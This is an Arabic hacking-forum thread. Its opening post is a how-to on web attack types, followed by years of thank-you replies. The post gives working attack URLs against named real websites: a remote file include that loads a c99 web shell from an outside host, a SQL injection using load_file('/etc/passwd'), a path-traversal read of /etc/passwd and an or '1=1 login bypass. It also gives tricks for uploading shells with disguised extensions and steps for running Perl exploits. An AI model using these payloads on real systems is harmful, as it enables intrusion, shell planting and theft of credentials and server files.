المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : شرح كامل لمعظم أنواع الثغرات ExPLoit



ASDELY-ScOrPiOn
07-23-2009, 11:04 AM
بسم الله الرحمن الرحيم

كيفكم اخواني انشا الله بخير

موضوعنا اليوم

نبذه عن معظم انواع الثغرات بإذن الله العظيم

بسم الله بدأنآ

1 - ثغرات ريموت فايل انكلود Remot File include

طبعا من اشهر انواع الثغرات

سببها ،، قيام المبرمج بعمل خطأ فادح, وهو السماح لدالة انكلود

بأن تقوم بأستدعاء اى ملف وليس ملف محدد , ومنها يمكن للمخرب ان يقوم بأستدعاء ملف خارجى

كالشيل مثلا s1

لكن قليلة في وقتنا هذ1

طبعا الثغرة بتسمح لك ادراج ملف من خارج الموقع وهذا الملف بكون عبارة عن شيل s1

خلينا نشوف مثال


http://www.insights.co.il/site.php?page=http://shaja.jeeran.com/c99.txt?
معنا الموقع هذا

الملف المصاب site.php

المتغير المصاب ?page

=http://shaja.jeeran.com/c99.txt

رابط الشيل اللي هندرجو داخل الموقع

عن طريق الملف + المتغير المصاب

طبعآ لاننسى علامة الاستفهام ؟

انتهيها من النوع الأول

---------------------------------------------

2- SQL injection سكيول انجكشن

طبعا تنقسم الى قسمين SQL injection php وهو الحقن في ملفات الـ php

و SQL injection asp الحقن في ملفات asp يعني سيرفرات الويندوز والمواقع اللتي تستخدم ملفات asp

توضيح :

وهي ثغرات الحقن في قواعد البيانات

خطورة الثغرة خطيرة جدآ

لانها تسمح للمخترق بإستخراج بيانات المدير العام (admin)

وتسمح بحقن شيل في احدى المجلدات المصرحة مثل tmp/ images ...الخ

مثال على موقع مصاب بثغرة الحقن


http://www.dtincr.ph/news.php?id=1

لاحظ لو اضفت بعد المتغير 1 علامة '

فلاحظ وجود الخطأ


Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /home/dtincr/public_html/news.php on line 20

طبعا هذا خطأ سكيول

خلينا نشرح عنه شوية

اللي بهمنا news.php?id=1

news.php الملف المصاب

?id=1 المتغير المصاب

طبعا بيكون اكثر من رقم واحد

مثال ?id=42 ...الخ

مثال حي على استغلال ثغرة سكيول انجكشن




http://faganmedia.com/profile.php?id=%27+UNION+SELECT+1,2,3,4,5,load_fil e(%27/etc/passwd%27),7,8,9 (http://faganmedia.com/profile.php?id=%27+UNION+SELECT+1,2,3,4,5,load_fil e(%27/etc/passwd%27),7,8,9)--+



طبعا قمت باستغلال امر load_file وقرأت اليوزرات والمسارات للسيرفر عن طريق الامر etc/passwd

'طبعا الماجيك كوتس اوف لو انو اون كان ماعرفت أقرأ شي

شرح من الاخ Red-D3v1L

لاكتشاف واستغلال ثغرات الـ sql


http://www.4shared.com/file/101817977/f7f91468/SQL_ExPloit.html

انتهينا من ثغرات الحقن

------------------------------------------

3 - ثغرات اللوكال فايل انكلود local file include

طبعا هذه الثغرة تسمح لك بقراءة ملفات من السيرفر s1

مثل ملف الشادو المهم lol

مثال على قرآءة امر استخراج يوزرات ومسارات السيرفر

http://www.museumsinsel-berlin.de/in.../../etc/passwd (http://www.museumsinsel-berlin.de/index.php?lang=../../../../../../../etc/passwd)

طبعا الملف المصاب index.php

المتغير المصاب ?lang

وقدرنا نستغلو ونقرأ الأمر

انتهى الشرح للنوع الثالث
----------------------------------------------------------

4- ثغرات Remot file upload

طبعا هذا النوع سهل جدا

تسمح لك بادراج ملف

عبارة عن رفع ملف شيل باكثر من صيغة في مراكز التحميل

طبعا شفنا اكثر من ثغرة في مراكر التحميل العربية ولن اتطرق لوضع مثال

طبعا الثغرة بتسمح لك برفع ملف

ويجب عليك انك تشغل مخك

يعني مثلا عندنا مركز تحميل مايقبل صيغة php

نروح نجرب نرفع بامتداد rar

يعني يكون الامتداد كذ1 c99.php.rar

أو c99.php.gif

طبعا بأكثر من امتداد

ومش شرط ان الثغرة تكون في مركز التحميل فقط

احتمال لما تسجل بالموقع تروح ترفع شيل بدل الصورة في ملفك الشخصي lol

مثل ثغرة الـ phpizabi

انتيهنا من النوع الرابع ..

------------------------------------

5-ثغرات الـ Bypass

من اسهل الثغرات الموجودة

بتستطيع تدخل على اللوحة بدون الباسورد وبدون اليوزر

عن طريق ادراج رموز مثل or '1=1

طيب الرموز المستخدمة كثير ة


عن استغلال ثغرات الباي بآس




http://www.4shared.com/file/101822143/a5d458e8/Bypass.html

انتهينا من الشرح
.................................................. .

6- Database Backup Dump Vulnerability

ثغرات خطيرة جدا

وتسمح لك بنسخ قواعد البيانات كاملة

طبعا لما تحمل قواعد البيانات

رح تلاقي بآسورد المدير + الاعضاء مشفر بمقياس md5

وطبعا مواقع الفك كثيرة

انتهينا من النوع السادس

------------------------------------------------

7- Remote Admin Password Change

طبعا النوع هذا مشهور جدا

وطبعا الثغرة بتسمح لك بتغير باسورد مدير الموقع بدون الحاجة للباسورد القديم

طبعا المثال الحي ثغرة token joomla

الجميع بيعرفها بتقدر تغير باسورد الادمن باستخدام ' رمز التوكن

انتهينا من النوع السابع

-------------------------------------------------

8- perl exploit

وهي الثغرات اللي بتكون مكتوبة بلغة البيرل

طبعا بتقولولي كيف نعرف انو الثغرة مكتوبة بلغة البيرل

بقوللكم

ملفات البيرل بكون امتدادها مثل


exploit.pl
او مثلا ازا رحت موقع سيكيورتي ولقيت بداية الثغرة هالكود


#!/usr/bin/perl


اعرف على السريع انو الثغرة مكتوبة بلغة البيرل

استغلالها

لازم تكون منزل على جهازك مترجم البيرل ActivePerl

حتى يترجم ثغرات البيرل

طبعا الاستغلال بكون

حفظ الثغرة بامتداد .pl

مثلا Sec-t.pl

طبعا البرنامج رح تنصب بالمسار هذا


c:/perl
بعد ما نحفظ الثغر ة

نروح نضع ملف Sec-t.pl


c:/perl/bin
بعد هيك نروح للدوس cmd


cd
وندخل لقرص c

بعدها نتجه بالامر

cd perl
يصبح مسارنا


c:/perl
بعدها


cd bin

رح يصبح مسارنا


C:/pel/bin
بعدها شغل الثغرة بامر


perl Sec-t.pl
بعدها رح يعطيك كيفية استخدام الثغرة

انتهى شرح النوع الثامن

------------------------------------------

9- ثغرات File Disclosure

تستطيع من خلالها قراءة اي ملف من الموقع

انتهى الشرح للنوع التاسع

-----------------------------------
10- ثغرات xxs Cross-Site Scripting

وهي الثغرات اللي تستطيع من خلالها سحب الكوكيز الخاص بالضحية

وتحليله عن طريق برنامج cookies editor

عبر كود معين والأكواد المختصة كثيرة ماشا الله

وشركة الهوتميل مشهورة بثغرات الـ xxs


انتهى الشرح للنوع العاشر

--------------------------------------------

11- ثغرات Command Execution

وهى كذلك مشابه لثغرات الفايل انكلود ولكن الاختلاف انك تكتب اوامر لين**

على المتصفح بعد الاستغلال وتشبه ثغرات اللوكال انكلود s1

لانك تقدر تقرأ ملفات من السيرفر


-----------------------------

12- Buffer overflow ثغرات

الفيض overflow
الفيض هو الزياده عن تحمل الشيء او انك تزيد عن شي فوق المسموح

لبفر اوفر فلو عباره عن خطأ برمجي او نقص برمجي بالاصح يغفل عنه مصمم برنامج
يسمح لك هذا الخطاء او النقص البرمجي انك تعمل تحكم في الذاكره
عندما تدخل بيانات تفوق البفر الموجود في الذاكره مثل العمليه التي قمنا بها في الاوفر فلو
لذلك سميت buffer overflow
والبفر تحدث في حين المبرمج يعطي سماح لأدخال شيء ويغفل عن اعطاء تحديد للشرط
فعند ادخال بيانات في المحدد يحدث هنا البفر

هذا كان توضيح فقط عن ثغرات البفر اوفر فلو

-------------------------------------------------

alzaaem
07-26-2009, 12:57 AM
يسلمو اديك

و الله موضوع بمنتهى الاهمية

تحياتي

اسد سوريا
09-15-2009, 05:09 AM
مشكور اخي لما تقدمه للمنتدى

محترف
10-15-2009, 05:24 PM
مشكووووور يا سلام على هالمواضيع

Dz V!Rus
11-16-2009, 09:09 PM
تم قرائتها جميعا

بعضها استفدت منها صراحة

لكن الأخرى لماذا لا يوجد شرح لها أخي

THE DEVILS
12-06-2009, 09:22 PM
http://www.samysoft.net/forumim/shokr/2/6856229832.gif

pedros47
12-23-2009, 11:04 AM
مشكور

تحياتي

ياريت توضيح اكثر

بارك الله فيك

ghou91
12-26-2009, 11:37 PM
thank you very much

n.rock
12-29-2009, 01:05 AM
يعطيك الــ 1000 ــف عافيه عالمجهوود ,,

زيكوو
01-06-2010, 08:11 PM
اسمحلي ان ابدي اعجابي باسلوبك الرائع والمتميز

سلتوح
01-23-2010, 03:27 PM
ألله يعطيكـ آلعافيه

وإصل يا ملك

w7sh-oman
03-01-2010, 10:42 AM
مكوووور يا عثل

mgik
04-03-2010, 10:38 AM
جزاك الله خيرا علي الشرح الرائع

Hack-Max
04-20-2010, 12:11 PM
مشكور اخي !!!!!!!!!!!!!!!!!!!!

عساف الشمري
05-22-2010, 08:57 PM
جاري المتابعه

وعساك على القوه يابطل

saw-19
06-03-2010, 05:14 PM
بارك الله فيك أخي

ريان المالكي
08-01-2010, 02:25 AM
يعطيك الف عافيه مبدع كل العاده

HeRO HACKER
08-20-2010, 11:36 PM
يالبى قلبك بصراحه شرح وافي وكافي ولي رجع لحفظها التام باذن الله

A.emam
08-21-2010, 01:44 AM
مبدع اسمحلي بتقدير اعجابي
مشكوووووورررررررررر

niper$
08-25-2010, 09:34 PM
شرح جميل ولكن لو انه بالصور يصبح اجمل دائما

مشكورررررررر اخي على التميز الدائم

تحياتي

معآذ لغفيري
09-05-2010, 04:26 AM
لو ممكن رآبط الشيل c99 الله يخليك أخي .

satan-jxx
09-16-2010, 12:24 PM
http://i66.servimg.com/u/f66/14/16/50/10/1010.gif

http://i66.servimg.com/u/f66/14/16/50/10/ff13110.gif
.......
.....
...
.

http://i66.servimg.com/u/f66/14/16/50/10/620-jz10.gif

.
...
.....
.......

http://i66.servimg.com/u/f66/14/16/50/10/ff13110.gif

http://i66.servimg.com/u/f66/14/16/50/10/810.gif

adonis
09-30-2010, 04:48 PM
مشكوووووور

mixraan
11-25-2010, 09:39 PM
مجهود رائع وجاري المتابعة

صعيدى هكر
11-27-2010, 11:43 PM
مشكووووووووووور اخى / ونتمنى شرح ابسط فالمواضيع القادمة

اغيلاس
12-02-2010, 08:45 PM
تحياتي تحياتي تحياتي تحياتي

e . V . E . L
12-03-2010, 08:09 AM
شرح وافي وكافي تسلم حبيبي على الموضوع الرائع ..

Violent
12-03-2010, 11:25 AM
يعطيك آلعآفية .. كفيت ووفيت ..

dark_ma
12-05-2010, 09:12 PM
مشكووووور يا سلام على هالمواضيع

Abedghammar
12-06-2010, 05:08 PM
اسمحلي ان ابدي اعجابي باسلوبك الرائع والمتميز

falluje
12-05-2011, 11:10 PM
موضوع رائع وجميل بارك الله فيك

tamorelking
12-08-2011, 12:52 AM
شكرا يا باشا شرح جميل

alwa7ch
02-04-2012, 10:30 PM
يعطيك الــ 1000 ــف عافيه

alwa7ch
02-04-2012, 10:31 PM
ايعطيك الــ 1000 ــف عافيه عالمجهوود ,,

alwa7ch
02-04-2012, 10:32 PM
شكرااااااا

flashmen
11-15-2013, 11:02 PM
مشكووووووووور

Saad.Nabir111
11-16-2013, 12:27 AM
جاري المتابعة, تقبل مروري
http://www.imageguru.org/files/img/user_uploads/displayimage.php?id=61jj0hj63r45054858.gif